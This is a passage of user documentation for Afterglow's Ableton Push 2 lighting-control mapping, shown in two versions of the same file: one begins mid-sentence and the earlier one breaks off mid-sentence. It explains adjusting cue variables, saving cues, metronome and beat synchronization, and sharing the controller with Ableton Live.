<<cues#creating-function-cues,function\ncue>> for the Torrent moving head spot:\n\nimage::AdjustingShake.jpg[Adjusting gobo shake cue]\n\nWhen you release the encoder knob, the adjustment graph returns to its\nnormal brightness, and the touch strip deactivates.\n\nThis photo also illustrates the dimming of incompatible cues discussed\n<<exclusivity,above>>: The leftmost columns of blue cues all establish\nsettings for the fixed gobo wheel of one of the Torrent moving-head\nspots. Since one of them is active (the `T1 atom shake` effect being\nadjusted corresponds to the bright blue button three rows down the\nsecond column), the others are dimmed to hint that pressing them would\nreplace the active cue.\n\nThis dimming can also be seen in the web interface view of the cue grid:\n\n[[gobo-photo]]\nimage::GoboCues.png[Gobo cues]\n\n=== Boolean Cue Variables\n\nIf a cue has Boolean variables assigned to it, they will also appear\nabove the effect name, with the current value showing as `Yes` or\n`No`. To adjust them you also start by grabbing the closest encoder.\nWith a Boolean value, the adjustment graph is always half full, and\nyou rotate it to the left for No, or right for Yes:\n\nimage::AdjustingDown2.jpg[Adjusting a Down? cue variable]\n\nNOTE: The `Blade Saw` cue in the photo is also an example of a cue\nthat defines a custom visualization. Underneath its variable gauges,\nit draws an animated view of the previous and upcoming measure of\ntime, with down beats marked in red as they are in the Metronome\nsection. The visualization is a strip chart showing the dimmer level\nthat the cue will establish at each point in time. 
As you adjust the\ncue variables, the visualization instantly updates to reflect your\nchanges, helping you understand how they affect it.\n\nimage::blade-saw.gif[Cue visualization animation]\n\nYou can also use the touch strip when setting a Boolean variable;\ntouching the top half sets it to `Yes`, while the bottom half sets it to\n`No`.\n\nimage::AdjustingDown2Strip.jpg[Adjusting a Down? cue with the touch strip visible]\n\nNOTE: The `Rainbow Pulse` cue to the left of the one being adjusted is\nan example of a cue with no variables to adjust.\n\n=== Color Cue Variables\n\nIf a cue has color variables assigned to it, they will also appear\nabove the effect name. The currently assigned color value will be\ndisplayed as a swatch and a six-digit hexadecimal number representing\nthe eight-bit red, green, and blue components of the color value,\n#rrggbb. In this photo, a `Color all` cue with a color variable that\nstarts out white has just been launched:\n\nimage::ColorParam2.jpg[Cue with color variable]\n\nWhen an effect is displaying a color cue variable, the gauges beneath\nit represent hue and saturation values. (If the cue has only one\nvariable, both of these will always be visible. Otherwise, only the\none underneath the variable's encoder will be visible until you start\nadjusting that variable, at which point the other color gauge will\nappear.)\n\nTouching the associated encoder will open up a special color selection\ninterface, which takes over the entire cue grid, as well as the effect\ncell:\n\nimage::ColorPalette2.jpg[Color adjustment palette]\n\nIn addition to adjusting the color's hue and saturation using the\nencoders above the effect, you can instantly jump to a color by\ntapping any of the pads in the grid, which form a palette of four\nsaturation levels of hues spread across the rainbow. The four pads on\nthe bottom right let you select white, medium gray, and black as color\nvalues as well, and the last pad displays a preview of the currently\nselected color, rather than doing anything when you press it.\n\nIf any pad other than the preview pad matches the currently selected\ncolor, it blinks (regardless of whether you chose that color by\npressing the pad or by turning the encoders).\n\nWhile you are holding the hue or saturation encoder, you can also use\nthe touch strip to see and jump to any value in that encoder's range.\nIf both encoders are being held, the touch strip allows you to select\nsaturations, since the grid pads already give you an easy interface\nfor selecting hues.\n\nimage::color-all.gif[Color selection animation]\n\nAs soon as you let go of both the hue and saturation encoders, the\npalette disappears and the normal cue grid returns.\n\n=== Scrolling Through Cue Variables\n\nIf a cue has more than two variables, even though you can only see two\nat a time on the Push, you can still check and adjust all of them.\nWhenever there are too many to fit, the rightmost pad just below the\neffect display will be lit white and labeled kbd:[Next Vars >] as shown below:\n\nimage::MoreVars2.jpg[More than Two Cue Variables]\n\nIn the photo, the `Torrent Sine` and `Blade Triangle` cues have more\nvariables than are being displayed, while the `Color all` cue does\nnot.\n\nEach time you press a kbd:[Next Vars >] button, you will see the next\ntwo variables assigned to the cue. Once you reach the end of the list,\nit wraps back to the beginning. Grabbing an encoder above the\nvariables will adjust whichever variable is currently displayed\nbeneath it. 
(While you are holding encoders to adjust an effect's\nvariables, its kbd:[Next Vars >] button will be blacked out and\ndisabled.)\n\n=== Saving Cues\n\nIf you have made any adjustments to cue variable values, these are\nnormally discarded when you end the cue; the next time it begins, it\nstarts with the values that were configured in the show. You can\nchange that by saving the cue's variables. To begin, hold down the\nkbd:[◯] button near the bottom left of the Push 2:\n\nimage::Saving2.jpg[Saving Cue Variables]\n\nWhile this button is held down, the red kbd:[End] buttons beneath the\neffect list disappear, and are replaced with the cue saving interface.\nIf you have made any adjustments to a cue's variables since it was\nstarted, a green kbd:[Save] button will appear (like the one beneath\nthe `Color all` effect in the photo above). Pressing that will save\nthe adjustments you made, so the next time you launch the cue, the\nadjusted values will be used.\n\nWhen you save a color cue that is configured like the ones in the\nsample show, the color of the cue's pad in the cue grid is updated to\nreflect the new color you have chosen. (Its color in the web\ninterface cue grid is updated as well.)\n\nOnce you have saved a cue's variables, while it is running, instead of\na green kbd:[Save] button, you will see an amber kbd:[Clear] button\n(like the one beneath the `Torrent Sine` effect in the photo).\nPressing that will remove the saved values, so the cue goes back to\nits original configuration.\n\nIf you save a cue's variables, and then adjust them further, the\nkbd:[Save] button returns, allowing you to save your new values. If\nyou don't, the values you saved earlier will be used the next time you\nstart the cue.\n\nIf a cue's variables have neither been saved nor adjusted, no\nkbd:[Save] or kbd:[Clear] button appears (like for the `Blade\nTriangle` effect in the photo). Of course, while saving cues, you can\nstill scroll through their variables using the kbd:[Next Vars >]\nbuttons.\n\nOnce you release the kbd:[◯] button, the save interface goes\naway, and the effect kbd:[End] buttons return.\n\nimage::save-clear.gif[Save interface animation]\n\n== Metronome Control\n\nThe top left section of the Push lets you view and adjust the\nMetronome that the show is using to keep time with the music that is\nbeing played. Since Afterglow's effects are generally defined with\nrespect to the metronome, it is important to keep it synchronized with\nthe music. When active, the metronome section takes over the leftmost\nquarter of the graphical display (so there is room to see only three\neffects, rather than the normal four). To toggle the metronome\nsection, press the kbd:[Metronome] button. It will appear if it was\nnot showing, and disappear if it was there. The kbd:[Metronome] button\nis lit more brightly when the section is active.\n\nThe metronome section shows the current speed, in Beats Per Minute, of\nthe metronome, and the kbd:[Tap Tempo] button label flashes at each beat\n(this flashing happens regardless of whether the metronome section is\nvisible in the display). The metronome section also shows you the\ncurrent phrase number, the bar within that phrase, and the beat within\nthat bar which has been reached.\n\nimage::Metronome2.png[Metronome section]\n\nFinally, below the beat and BPM displays, there is a visualization of\nthe passing beats, bars, and phrases. The beats are drawn in white,\nwith their phase increasing until the next beat hits. 
In a layer\nbeneath them, the measures (bars) are drawn in red, and beneath those,\nthe phrases in blue. The current moment in time is centered in the\nvisualization with a stationary line to mark it, and there is room for\none measure before and after the line. A full phrase doesn't fit, but\nyou can see its phase gradually growing until it ends.\n\nimage::metronome-phrase.gif[One phrase of metronome animation]\n\nThe most basic way of synchronizing the metronome is to tap the\nkbd:[Tap Tempo] button at each beat of the music. Tapping the button\naligns the metronome to a beat and, if you tap it three or more times\nwithin two seconds of each preceding tap, sets the metronome's BPM.\nTap it as you hear each beat of the music, and after three or more\ntaps, the speed of the metronome will be approximately synchronized\nwith the music.\n\nOnce the tempo is correct, you can tell Afterglow which beat is the\ndown beat by holding down the kbd:[Shift] button while pressing\nkbd:[Tap Tempo]. This combination does not change the tempo, but tells\nAfterglow that the moment when you tapped the button is the down beat\n(the first beat of a bar).\n\nYou can also adjust the BPM by turning the BPM encoder, which is the\nencoder right above the kbd:[Metronome] button:\n\nimage::Push2BPM.jpg[BPM encoder]\n\nWhile you are holding this encoder, the BPM gauge brightens, along\nwith the BPM digit after the decimal point, as a visual reminder of\nwhat value you are adjusting. Turning the encoder clockwise raises the\nBPM; turning counterclockwise lowers it. While the metronome section\nis showing, you can also use the encoder above the BPM value to adjust\nit. But you can grab the dedicated BPM encoder above the\nkbd:[Metronome] button even when the metronome section is not showing,\nand it will appear while you have the encoder in your hand, so you can\nadjust the BPM quickly, and then get back to what you were doing.\n\nIf you press the kbd:[Shift] button, the BPM encoder can be used to\nadjust the BPM in whole beats per minute rather than tenths. While kbd:[Shift] is\ndown, the BPM value before the decimal point will be brightened,\nrather than the digit after it, and the BPM will change ten times as\nquickly when you turn it. You can switch back and forth in the middle\nof your adjustments by pressing and releasing the shift key at any\ntime.\n\nIn order to make longer chases and effects line up properly with the\nmusic, you will also want to make sure the count is right, that the\nbeat number shows `1` on the down beat, and that the bar numbers are\nright as well, so that the start of a phrase is reflected as bar\nnumber `1`. In addition to using kbd:[Shift] with kbd:[Tap Tempo] to\nset the down beat, you can adjust the current beat number using the\nbeat encoder, the encoder above the kbd:[Tap Tempo] button:\n\nimage::Push2Beat.jpg[Beat encoder]\n\nWhile you are holding this encoder, an endless circular gauge appears\nbelow the beat information, and the beat number is brightened, as a\nvisual reminder of what value you are adjusting. Turning the encoder\nclockwise jumps to the next beat; turning counterclockwise jumps back\nto the previous one. As a tactile reminder that you are adjusting\nwhole beats, this encoder moves with a distinct click as it changes\nvalue, while the BPM encoder turns smoothly as you scroll through\nfractional BPM values.\n\nWhile the metronome section is showing, you can also use the encoder\nabove the Beat value to adjust it. 
But you can grab the dedicated Beat\nencoder above the kbd:[Tap Tempo] button even when the metronome\nsection is not showing, and it will appear while you have the encoder\nin your hand, so you can adjust the beat number quickly, and then get\nback to what you were doing.\n\nIf you press the kbd:[Shift] button, the Beat encoder can be used to\nadjust the current bar within the phrase instead of the current beat.\nWhile kbd:[Shift] is down, the bar will be brightened instead of the\nbeat, and turning the encoder will jump that value forwards or\nbackwards:\n\nimage::beat-adjustment.gif[Beat adjustment animation]\n\nIf you know a phrase is about to begin, you can press the red\nkbd:[Reset] button in the metronome section right as it does. This\nwill reset the count to Phrase 1, Bar 1, Beat 1.\n\nTrying to keep up with tempo changes during dynamic shows can be\ntedious, so you will hopefully be able to take advantage of\nAfterglow's metronome synchronization features. If the DJ can send you\n<<mapping_sync#syncing-to-midi-clock,MIDI clock pulses>>, or you can\nconnect via a Local Area Network to Pioneer professional DJ gear to\nlock into the beat grid established by\n<<mapping_sync#syncing-to-pro-dj-link,Pro DJ Link>>, Afterglow can\nkeep the BPM (with MIDI) and even the beats (with Pro DJ Link and the\nTraktor Afterglow Beat Phase\n<<mapping_sync#syncing-to-traktor-beat-phase,controller mapping>>)\nsynchronized for you. The Sync button in the Metronome section\n(showing kbd:[Manual] sync in these photos) will eventually allow you to\nset this up, but that is not yet implemented, so for now you will need\nto use the <<README#metronome-control,web interface>> to configure it.\n\nNOTE: The button does already change color to let you know the sync\nstatus: amber means manual, green means successful automatic sync, and\nred means a requested automatic sync has failed. It is likely that a\nfuture release of Afterglow will let you press this button to choose\nyour sync source.\n\nOnce your sync is established, the meaning of the kbd:[Tap Tempo]\nbutton changes. If you are using MIDI clock to sync the BPM, it\nbecomes a kbd:[Tap Beat] button, which simply establishes where the\nbeat falls. If you are locked in to a Pro DJ Link beat grid or using\nthe Traktor beat phase mapping, the beats are automatically aligned\nfor you so, it becomes a kbd:[Tap Bar] button which, when pressed,\nindicates that the current beat is the down beat (start) of a bar.\n(Similarly, if you press the metronome kbd:[Reset] pad while synced to\na Pro DJ Link beat grid or Traktor beat phase, the beat itself will\nnot move, but the beat closest to when you pressed the pad will be\nidentified as Beat 1.) In these sync modes you can also use the\nkbd:[Shift] button to align at the next bigger boundary: If tapping\nwould normally move the bar, shift-tapping will move the phrase.\n\nIf you try to adjust the BPM encoder while sync is active, it will\nhave no effect, and Afterglow will point at the sync mode to explain\nwhy it is ignoring your adjustments.\n\n=== Sharing the Push 2\n\nIf you are using Afterglow at the same time as Ableton Live, you can\nswitch back and forth between which has control of the Push by\npressing the kbd:[User] button. 
If Live is not running when you press\nkbd:[User], the Push interface will simply go blank (except for the\nkbd:[User] button itself), until you press it again, at which point\nAfterglow will light it up.\n\nNOTE: Future releases will take advantage of more of the buttons on\nthe controller.\n\ninclude::partial$Footer.adoc[]\n","old_contents":"= Using Ableton Push 2\nJames Elliott <james@deepsymmetry.org>\n:icons: font\n:experimental:\n:toc:\n:toc-placement: preamble\n:api-doc: http:\/\/deepsymmetry.org\/afterglow\/api-doc\/\n\n\/\/ Set up support for relative links on GitHub, and give it\n\/\/ usable icons for admonitions, w00t! Add more conditions\n\/\/ if you need to support other environments and extensions.\nifdef::env-github[]\n:outfilesuffix: .adoc\n:tip-caption: :bulb:\n:note-caption: :information_source:\n:important-caption: :heavy_exclamation_mark:\n:caution-caption: :fire:\n:warning-caption: :warning:\nendif::[]\n\nSome controllers have such rich capabilities that they deserve their\nown custom mapping implementations to exploit their capabilities as a\nshow control interface. The Push 2 called out for such treatment, and\nthankfully in March 2016 Ableton published\nhttps:\/\/github.com\/Ableton\/push-interface\/blob\/master\/doc\/AbletonPush2MIDIDisplayInterface.asc[documentation]\nwhich made that possible, and a\n{api-doc}afterglow.controllers.ableton-push-2.html[mapping] has been\ncreated. You can use it to do most of the things that you would use\nthe <<README#web-ui,web interface>> for, often with deeper control,\nsince you can press multiple cue trigger pads at the same time, and\nthey respond to variations in pressure.\n\nNOTE: Although this page discusses the second version of the Push\ncontroller, with a graphical display, there is also a page describing\nthe <<push#using-ableton-push,original Push mapping>>, which is still\nfully supported.\n\n## Binding to the Push 2\n\nAssuming you have an Ableton Push 2 connected to the machine running\nAfterglow and powered on, it will be noticed, identified, and\nactivated as soon as you have set up the sample show. You will see a\nbrief startup animation, and Afterglow's Push 2 interface will appear.\n\nTIP: For information about how to set up bindings without the sample\nshow, or more details about how it works, see\n<<mapping_sync#setting-up-grid-controller-bindings,Setting Up Grid\nController Bindings>>.\n\nHere is an overview of how the Push 2 mapping works, with details\nexplained in the upcoming sections:\n\nimage::Push2NoEffects.jpg[Push 2 interface]\n\nThe most exciting innovation that the Push 2 adds to the already\nexcellent Push experience is the color graphic display, and Afterglow\ncan take full advantage of it, as this example shows:\n\nimage::Example.gif[Afterglow graphic animation]\n\n== Show Control\n\nOnce you have the Push 2 bound to a show, it becomes a very direct and\ntactile way to monitor and control the cues and other aspects of the\nshow.\n\nThe graphical display at the top of the Push displays the effects\ncurrently running, and can optionally display\n<<metronome-control,metronome>> information as well. 
If a cue was\ndefined with adjustable variables for its effect, they will also be\ndisplayed, and you will be able to <<effect-control,adjust>> them by\nturning the encoder above the variable.\n\nThe rightmost encoder, past the display, adjusts the show Grand\nMaster, which controls the maximum brightness that any dimmer cue can\nachieve, so you can always use it to adjust the overall brightness of\nthe show. As soon as you touch the encoder, the Grand Master level\nwill appear along with a gauge representing what fraction of its\nmaximum level is currently in effect, and both will be updated as you\nturn the encoder. When you release it, the display returns to showing\nwhatever it was before.\n\nimage::GrandMaster2.jpg[Grand Master adjustment]\n\nAs with other numeric values that you can adjust, while you are\nadjusting the Grand Master, the touch strip on the left hand side of\nthe Push will light up in the same proportion as the circular gauge\nin the display under the encoder, and you can touch or drag on the\nstrip to instantly set the level to whatever value you want.\n\nThe red kbd:[▷] button at the bottom left of the cue grid\ncan be used to temporarily shut down the show, blacking out all\nuniverses that it controls, and suspending the processing of its\neffects.\n\nimage::ShowStop2.jpg[Show stopped]\n\nWhenever the show is stopped, the kbd:[▷] button turns green to\nrepresent “Play”. Pressing it in this state restarts the show where it\nwould have been had it not stopped.\n\n== Cues\n\nMost of the space on the interface is dedicated to an 8×8 grid\nof color coded cue trigger pads, which provide a window onto the\nshow's overall <<cues#cues,cue grid>>. The Push 2 can be\n<<README#scrolling-and-linked-controllers,linked>> to the\n<<README#web-ui,web interface>> so that both always display the same\nsection of the cue grid, and the web interface can remind you of the\nnames of the cues you are looking at, or it can be scrolled\nindependently, allowing you access to more cues at the same time.\n\nTIP: If you have more than one compatible grid controller, you can\nhave Afterglow using all of them at the same time; each can be\nscrolled to different areas of the cue grid, and each can even be\nlinked to a different browser window if you have that much screen\nspace.\n\nYou can activate any cue shown by pressing its pad; running cues will\nlight up, and darken again when they end. The effects which cues\ncreate will also appear in the display above the cue pad, from left to\nright, with the most recent effect on the right. The labels containing\nthe effect name are drawn in the same color as the cue pad used to\nlaunch the effect, to help keep track of which is which. In the photo\nbelow, “Sparkle” is the most recent effect, and it has two\nvariables, `chance` and `Fade`, which can be adjusted by turning the\nencoders above them. The `chance` value is changing because it is\nconfigured to also be adjusted through the pressure sensitive cue pad\nthat was used to launch it.\n\nimage::SparklePressure2.jpg[Sparkle effect, adjusting chance variable]\n\nTo stop a running cue, press its pad again, or press the red kbd:[End]\npad underneath its effect entry in the display. Some cues will end\nimmediately, others will continue to run until they reach what they\nfeel is an appropriate stopping point. While they are in the process\nof ending, the cue pad will blink, and the kbd:[End] pad will be\nlabeled kbd:[Ending]. 
If you want the cue to end immediately even\nthough it would otherwise run for a while longer, you can press the\nblinking cue pad (or effect kbd:[Ending] pad) again and it will be\nkilled right then.\n\nThe colors assigned to cue pads by the creator of the cue grid are\nintended to help identify related cues. The same color is used in the\ncue label at the bottom of the graphical display, to help keep track\nof which cue came from where.\n\nSome cues (especially intense ones like strobes) are configured to run\nonly as long as they are held down. In that case, when you press a cue\npad, it lights up with a whitened version of the cue color as a hint\nthat this is happening, and as soon as you release the pad, the cue\nwill end. If you want to override this behavior, you can hold down the\nkbd:[Shift] button (towards the bottom right of the Push) as you press\nthe cue pad, and it will activate as a normal cue, staying on until\nyou press its pad a second time.\n\nAs noted above, cues can also be configured to take advantage of the\npressure sensitivity of the Push cue pads, so that as you vary the\npressure with which you are holding down the pad, some visible\nvariable of the cue is altered. The strobe and sparkle cues\ncreated by\n{api-doc}afterglow.examples.html#var-make-cues[`afterglow.examples\/make-cues`]\nfor the sample show work this way: the intensity and lightness of the\nstrobe are increased by pressure, and so is the chance that a sparkle\nwill be assigned to a light on each frame. You can see these\nvariables change in the display above the cue's effect name while\nyou are adjusting them, as shown in the photo above.\n\n[[exclusivity]]Cues may be mutually exclusive by nature, and if they\nwere created to reflect this (by using the same keyword to register\ntheir effects with the show, or specifying other effect keys in their\n`:end-keys` list), when you activate one, the other cues which use the\nsame keyword are dimmed. This is a hint that when you activate one of\nthem, it will _replace_ the others, rather than running at the same\ntime. In the photo <<gobo-photo,below>>, the rest of the\nTorrent 1 fixed gobo cues (the leftmost blue cues) are dimmed because\nthey would replace the running “T1 atom shake” cue.\n\n== Scrolling\n\nThe show will likely have many more cues than fit on the pad grid; the\ndiamond of arrow buttons to the right of the top of the cue grid allows\nyou to page through the larger show grid. If there are more cues\navailable in a given direction, that arrow will be lit, otherwise it\nis dark. Pressing an active arrow scrolls the view one\n“page” in that direction. In the photo below, it is\ncurrently possible to scroll up and to the right:\n\nimage::PushScroll2.jpg[Push 2 scroll diamond,286]\n\nIf you hold down the kbd:[Shift] button, the arrows will scroll you as\nfar as possible in the direction that you press.\n\nThe kbd:[Page <] and kbd:[> Page] buttons (toward the bottom right,\njust above kbd:[Shift]) allow you to scroll the graphical display left\nand right, to see and <<effect-control,adjust>> all of the currently\nrunning effects, even though only four at a time (or three, if the\n<<metronome-control,metronome section>> is showing) fit in the\ndisplay.\n\nPressing kbd:[Page <] scrolls the display left, showing you older\n(or lower priority) effects, and kbd:[> Page] scrolls to the right,\nshowing you newer and higher priority effects. 
Pressing these buttons\nwhile kbd:[Shift] is held will scroll as far as possible in the\ncorresponding direction. (As illustrated in the photo below, in\naddition to lighting up the kbd:[Page <] and kbd:[> Page] buttons when\nthere are effects off the screen in that direction, Afterglow draws\n`<` and `>` markers below the effect name labels at the corresponding\nedge of the screen.)\n\nimage::Push2Page.jpg[Push 2 page arrows]\n\n== Effect Control\n\nEffects, whether created by cues or other code, appear in the display\narea, and can be scrolled through and ended by pressing the\ncorresponding red kbd:[End] pad which appears underneath them. There\nare many ways you can interact with running effects:\n\n=== Numeric Cue Variables\n\nIf the effect was created by a cue that has numeric variables assigned\nto it, the variable names and values will appear above the effect\nname. The values can be adjusted using the encoder knob above the\nvariable. For example, in addition to varying the sparkle `chance`\nvariable using the pad pressure, as was done above, its `Fade`\nvariable can be adjusted using the effect variable encoder above it.\nAs soon as you touch the encoder knob associated with a variable, the\ngauge underneath its value brightens to indicate that you are\nadjusting it, and updates as you turn the encoder to change the value.\nIn the photo below, the `Confetti Dance` cue's `Min Last` variable is\nbeing adjusted.\n\nimage::AdjustingConfetti.jpg[Adjusting Min Last variable,693]\n\nAnd here is how the effect's display section updates while the value\nis being adjusted:\n\nimage::min-last.gif[Adjusting Min Last Animation]\n\nWhile you are adjusting the variable, the large touch strip on the\nleft hand side of the Push lights up to show you where you are in the\nvariable range, and you can touch and drag on the strip to instantly\nset the variable to another value.\n\nimage::AdjustingConfetti2.jpg[Adjusting and touch strip]\n\nMost numeric variables will have values that grow from the bottom of\nthe touch strip, but variables marked as `:centered` when created,\nlike Pan and Tilt, grow from the center up or down. (Their graphical\ngauges grow from the center as well.)\n\nimage::AdjustingCentered2.jpg[Adjusting centered cue variables]\n\nimage::pan-tilt.gif[Adjusting centered variable animation]\n\nIf an effect has only one adjustable variable, it will take up the\nentire effect area, and you can use either encoder to adjust it, as\nwhen adjusting a gobo shaking <<cues#creating-function-cues,function\ncue>> for the Torrent moving head spot:\n\nimage::AdjustingShake.jpg[Adjusting gobo shake cue]\n\nWhen you release the encoder knob, the adjustment graph returns to its\nnormal brightness, and the touch strip deactivates.\n\nThis photo also illustrates the dimming of incompatible cues discussed\n<<exclusivity,above>>: The leftmost columns of blue cues all establish\nsettings for the fixed gobo wheel of one of the Torrent moving-head\nspots. Since one of them is active (the `T1 atom shake` effect being\nadjusted corresponds to the bright blue button three rows down the\nsecond column), the others are dimmed to hint that pressing them would\nreplace the active cue.\n\nThis dimming can also be seen in the web interface view of the cue grid:\n\n[[gobo-photo]]\nimage::GoboCues.png[Gobo cues]\n\n=== Boolean Cue Variables\n\nIf a cue has Boolean variables assigned to it, they will also appear\nabove the effect name, with the current value showing as `Yes` or\n`No`. 
To adjust them you also start by grabbing the closest encoder.\nWith a Boolean value, the adjustment graph is always half full, and\nyou rotate it to the left for No, or right for Yes:\n\nimage::AdjustingDown2.jpg[Adjusting a Down? cue variable]\n\nNOTE: The `Blade Saw` cue in the photo is also an example of a cue\nthat defines a custom visualization. Underneath its variable gauges,\nit draws an animated view of the previous and upcoming measure of\ntime, with down beats marked in red as they are in the Metronome\nsection. The visualization is a strip chart showing the dimmer level\nthat the cue will establish at each point in time. As you adjust the\ncue variables, the visualization instantly updates to reflect your\nchanges, helping you understand how they affect it.\n\nimage::blade-saw.gif[Cue visualization animation]\n\nYou can also use the touch strip when setting a Boolean variable;\ntouching the top half sets it to `Yes`, while the bottom half sets it to\n`No`.\n\nimage::AdjustingDown2Strip.jpg[Adjusting a Down? cue with the touch strip visible]\n\nNOTE: The `Rainbow Pulse` cue to the left of the one being adjusted is\nan example of a cue with no variables to adjust.\n\n=== Color Cue Variables\n\nIf a cue has color variables assigned to it, they will also appear\nabove the effect name. The currently assigned color value will be\ndisplayed as a swatch and a six-digit hexadecimal number, representing\nthe eight-bit red, green, and blue representation of the color value,\n#rrggbb. In this photo, a `Color all` cue with a color variable that\nstarts out white has just been launched:\n\nimage::ColorParam2.jpg[Cue with color variable]\n\nWhen an effect is displaying a color cue variable, the gauges beneath\nit represent hue and saturation values. (If the cue has only one\nvariable, both of these will always be visible. Otherwise, only the\none underneath the variable's encoder will be visible until you start\nadjusting that variable, at which point the other color gauge will\nappear.)\n\nTouching the associated encoder will open up a special color selection\ninterface, which takes over the entire cue grid, as well as the effect\ncell:\n\nimage::ColorPalette2.jpg[Color adjustment palette]\n\nIn addition to adjusting the color's hue and saturation using the\nencoders above the effect, you can instantly jump to a color by\ntapping any of the pads in the grid, which form a palette of four\nsaturation levels of hues spread across the rainbow. 
The four pads on\nthe bottom right let you select white, medium gray, and black as color\nvalues as well, and the last pad displays a preview of the currently\nselected color, rather than doing anything when you press it.\n\nIf any pad other than the preview pad matches the currently selected\ncolor, it blinks (regardless of whether you chose that color by\npressing the pad or by turning the encoders).\n\nWhile you are holding the hue or saturation encoder, you can also use\nthe touch strip to see and jump to any value in that encoder's range.\nIf both encoders are being held, the touch strip allows you to select\nsaturations, since the palette pads already give you an easy interface\nfor selecting hues.\n\nimage::color-all.gif[Color selection animation]\n\nAs soon as you let go of both the hue and saturation encoders, the\npalette disappears and the normal cue grid returns.\n\n=== Scrolling Through Cue Variables\n\nIf a cue has more than two variables, even though you can only see two\nat a time on the Push, you can still check and adjust all of them.\nWhenever there are too many to fit, the rightmost pad just below the\neffect display will be lit white and labeled kbd:[Next Vars >] as shown below:\n\nimage::MoreVars2.jpg[More than Two Cue Variables]\n\nIn the photo, the `Torrent Sine` and `Blade Triangle` cues have more\nvariables than are being displayed, while the `Color all` cue does\nnot.\n\nEach time you press a kbd:[Next Vars >] button, you will see the next\ntwo variables assigned to the cue. Once you reach the end of the list,\nit wraps back to the beginning. Grabbing an encoder above the\nvariables will adjust whichever variable is currently displayed\nbeneath it. (While you are holding encoders to adjust an effect's\nvariables, its kbd:[Next Vars >] button will be blacked out and\ndisabled.)\n\n=== Saving Cues\n\nIf you have made any adjustments to cue variable values, these are\nnormally discarded when you end the cue; the next time it begins, it\nstarts with the values that were configured in the show. You can\nchange that by saving the cue's variables. To begin, hold down the\nkbd:[◯] button near the bottom left of the Push 2:\n\nimage::Saving2.jpg[Saving Cue Variables]\n\nWhile this button is held down, the red kbd:[End] buttons beneath the\neffect list disappear, and are replaced with the cue saving interface.\nIf you have made any adjustments to a cue's variables since it was\nstarted, a green kbd:[Save] button will appear (like the one beneath\nthe `Color all` effect in the photo above). Pressing that will save\nthe adjustments you made, so the next time you launch the cue, the\nadjusted values will be used.\n\nWhen you save a color cue that is configured like the ones in the\nsample show, the color of the cue's pad in the cue grid is updated to\nreflect the new color you have chosen. (Its color in the web\ninterface cue grid is updated as well).\n\nOnce you have saved a cue's variables, while it is running, instead of\na green kbd:[Save] button, you will see an amber kbd:[Clear] button\n(like the one beneath the `Torrent Sine` effect in the photo).\nPressing that will remove the saved values, so the cue goes back to\nits original configuration.\n\nIf you save a cue's variables, and then adjust them further, the\nkbd:[Save] button returns, allowing you to save your new values. 
If\nyou don't, the values you saved earlier will be used the next time you\nstart the cue.\n\nIf a cue's variables have neither been saved nor adjusted, no\nkbd:[Save] or kbd:[Clear] button appears (like for the `Blade\nTriangle` effect in the photo). Of course, while saving cues, you can\nstill scroll through their variables using the kbd:[Next Vars >]\nbuttons.\n\nOnce you release the kbd:[◯] button, the save interface goes\naway, and the effect kbd:[End] buttons return.\n\nimage::save-clear.gif[Save interface animation]\n\n== Metronome Control\n\nThe top left section of the Push lets you view and adjust the\nMetronome that the show is using to keep time with the music that is\nbeing played. Since Afterglow's effects are generally defined with\nrespect to the metronome, it is important to keep it synchronized with\nthe music. When active, the metronome section takes over the leftmost\nquarter of the graphical display (so there is room to see only three\neffects, rather than the normal four). To toggle the metronome\nsection, press the kbd:[Metronome] button. It will appear if it was\nnot showing, and disappear if it was there. The kbd:[Metronome] button\nis lit more brightly when the section is active.\n\nThe metronome section shows the current speed, in Beats Per Minute, of\nthe metronome, and the kbd:[Tap Tempo] button label flashes at each beat\n(this flashing happens regardless of whether the metronome section is\nvisible in the text area). The metronome section also shows you the\ncurrent phrase number, the bar within that phrase, and the beat within\nthat bar which has been reached.\n\nimage::Metronome2.png[Metronome section]\n\nFinally, below the beat and BPM displays, there is a visualization of\nthe passing beats, bars, and phrases. The beats are drawn in white,\nwith their phase increasing until the next beat hits. In a layer\nbeneath them, the measures (bars) are drawn in red, and beneath those,\nthe phrases in blue. The current moment in time is centered in the\nvisualization with a stationary line to mark it, and there is room for\none measure before and after the line. A full phrase doesn't fit, but\nyou can see its phase gradually growing until it ends.\n\nimage::metronome-phrase.gif[One phrase of metronome animation]\n\nThe most basic way of synchronizing the metronome is to tap the\nkbd:[Tap Tempo] button at each beat of the music. Tapping the button\naligns the metronome to a beat, and if you tap it three or more times\nwithin two seconds of each preceding tap, sets the metronome's BPM.\nTap it as you hear each beat of the music, and after three or more\ntaps, the speed of the metronome will be approximately synchronized\nwith the music.\n\nOnce the tempo is correct, you can tell Afterglow which beat is the\ndown beat by holding down the kbd:[Shift] button while pressing\nkbd:[Tap Tempo]. This combination does not change the tempo, but tells\nAfterglow that the moment when you tapped the button is the down beat\n(the first beat of a bar).\n\nYou can also adjust the BPM by turning the BPM encoder, which is the\nencoder right above the kbd:[Metronome] button:\n\nimage::Push2BPM.jpg[BPM encoder]\n\nWhile you are holding this encoder, the BPM gauge brightens, along\nwith the BPM digit after the decimal point, as a visual reminder of\nwhat value you are adjusting. Turning the encoder clockwise raises the\nBPM, turning counterclockwise lowers it. While the metronome section\nis showing, you can also use the encoder above the BPM value to adjust\nit. 
But you can grab the dedicated BPM encoder above the\nkbd:[Metronome] button even when the metronome section is not showing,\nand it will appear while you have the encoder in your hand, so you can\nadjust the BPM quickly, and then get back to what you were doing.\n\nIf you press the kbd:[Shift] button, the BPM encoder can be used to\nadjust the BPM by whole beats rather than tenths. While kbd:[Shift] is\ndown, the BPM value before the decimal point will be brightened,\nrather than the digit after it, and the BPM will change ten times as\nquickly when you turn it. You can switch back and forth in the middle\nof your adjustments by pressing and releasing the shift key at any\ntime.\n\nimage::bpm-adjustment.gif[BPM adjustment animation]\n\nIn order to make longer chases and effects line up properly with the\nmusic, you will also want to make sure the count is right, that the\nbeat number shows `1` on the down beat, and that the bar numbers are\nright as well, so that the start of a phrase is reflected as bar\nnumber `1`. In addition to using kbd:[Shift] with kbd:[Tap Tempo] to\nset the down beat, you can adjust the current beat number using the\nbeat encoder, the encoder above the kbd:[Tap Tempo] button:\n\nimage::Push2Beat.jpg[Beat encoder]\n\nWhile you are holding this encoder, an endless circular gauge appears\nbelow the beat information, and the beat number is brightened, as a\nvisual reminder of what value you are adjusting. Turning the encoder\nclockwise jumps to the next beat, turning counterclockwise jumps back\nto the previous one. As a tactile reminder that you are adjusting\nwhole beats, this encoder moves with a distinct click as it 